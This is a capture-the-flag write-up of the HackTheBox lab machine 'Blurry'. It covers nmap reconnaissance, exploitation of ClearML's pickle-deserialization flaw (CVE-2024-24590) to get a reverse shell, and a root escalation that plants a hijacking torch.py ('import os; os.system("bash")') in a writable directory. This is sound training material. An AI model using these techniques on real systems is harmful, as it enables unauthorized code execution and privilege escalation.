Blurry is a medium-difficulty HackTheBox machine dealing initially with CVE-2024-24590 where we’ll be creating our own task inside of a pre-existing ClearML project and infecting an artifact to execute our own malicious code. Later with a pretty simple privilege escalation technique by replacing an imported package by our own python script which will execute it from the current directory, granting us root :)
PS C:\Users\0xkujen> nmap -A-Pn10.129.134.46 Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-1017:59 W. Central Africa Standard Time NSOCK ERROR [0.2440s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for10.129.134.46 Host is up (0.12s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 30723e21d5dc2e61eb8fa63b242ab71c05d3 (RSA) | 2563911423f0c250008d72f1b51e0439d85 (ECDSA) |_ 256 b06fa00a9edfb17a497886b23540ec95 (ED25519) 80/tcp open http nginx 1.18.0 |_http-title: Did not follow redirect to http://app.blurry.htb/ |_http-server-header: nginx/1.18.0 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=10/10%OT=22%CT=1%CU=34823%PV=Y%DS=2%DC=T%G=Y%TM=670807 OS:FB%P=i686-pc-windows-windows)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS= OS:A)SEQ(CI=Z)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11 OS:NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE OS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4 OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40 OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y OS:%DFI=N%T=40%CD=S)
Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1183.00 ms 10.10.16.1 2183.00 ms 10.129.134.46
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in33.73 seconds
We can see that we have both 22 and 80 ports open.
As soon as trying to log in to http://10.129.134.46, we get redirected to http://app.blurry.htb, so let’s add and entry for blurry.htb and app.blurry.htb on our /etc/hosts file.
ClearML
We are prompted with a ClearML login page. (ClearML allows you to build, train, and deploy your AI/ML and LLM models at scale with few lines of code.)
Checking for known vulnerabilities for ClearML, I stumbled upon CVE-2024-24590 which is a deserialization attach of untrusted data that can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with. Excatly what we need!
Therefore, I crafted this script which will create a Task inside of the Black Swan project, then upload an artifact named pickle_artifact with our malicious RunCommand function to be executed inside of it:
kujen@LAPTOP-GEVGOPRU:$ clearml-init ClearML SDK setup process
Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration) Or create a free account at https://app.clear.ml/settings/workspace-configuration
In settings page, press "Create new credentials", then press "Copy to clipboard".
New configuration stored in /home/kujen/clearml.conf ClearML setup completed successfully.
And then execute my script and get a shell and our user flag:
1 2 3 4 5 6 7 8 9 10 11
PS C:\Users\0xkujen> nc -lvnp4444 listening on [any] 4444 ... connect to [10.10.x.x] from (UNKNOWN) [10.129.134.46] 36214 bash: cannot set terminal processgroup (4588): Inappropriate ioctl for device bash: no job control in this shell jippity@blurry:~$ whoami jippity jippity@blurry:~$cat user.txt 8c77b0c2fda403****************** jippity@blurry:~$
Privilege Escalation to root
We can see that the user can execute something interesting as root:
1 2 3 4 5 6 7 8
jippity@blurry:~$ sudo -l Matching Defaults entries for jippity on blurry: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jippity may run the following commands on blurry: (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth jippity@blurry:~$
Taking a look at /usr/bin/evaluate_model we can see that it’ll execute a evaluate_model.py script from the /models directory. Also taking a look at the /models folder permissions, we can see that we have write permissions on it:
1
drwxrwxr-x 2 root jippity 4096 Aug 1 11:37 models
The first thought that comes to my mind is to create a malicious /models/evaluate_model.py file with our malicious script to land a reverse shell as root as soon as we execute the /usr/bin/evaluate_model /models/*.pth command, but turns out the evaluate_model.py file is unwritable(that is how I first solved the box but it was patched later:<) The simplest next idea that came to my mind is to mess with the packages imported in our script, therefore I created a file named torch.py with malicious contents, then executed the evaluate_model script because it will be first looking for the imported packages inside the current working directory, there landing root:
1 2 3 4 5 6 7
jippity@blurry:/models$ cat torch.py import os; os.system("bash") jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/*.pth [+] Model /models/demo_model.pth is considered safe. Processing... root@blurry:/models# cat /root/root.txt 825af87166ef62****************** root@blurry:/models#
That was it for Blurry! Hope you liked it. -0xkujen
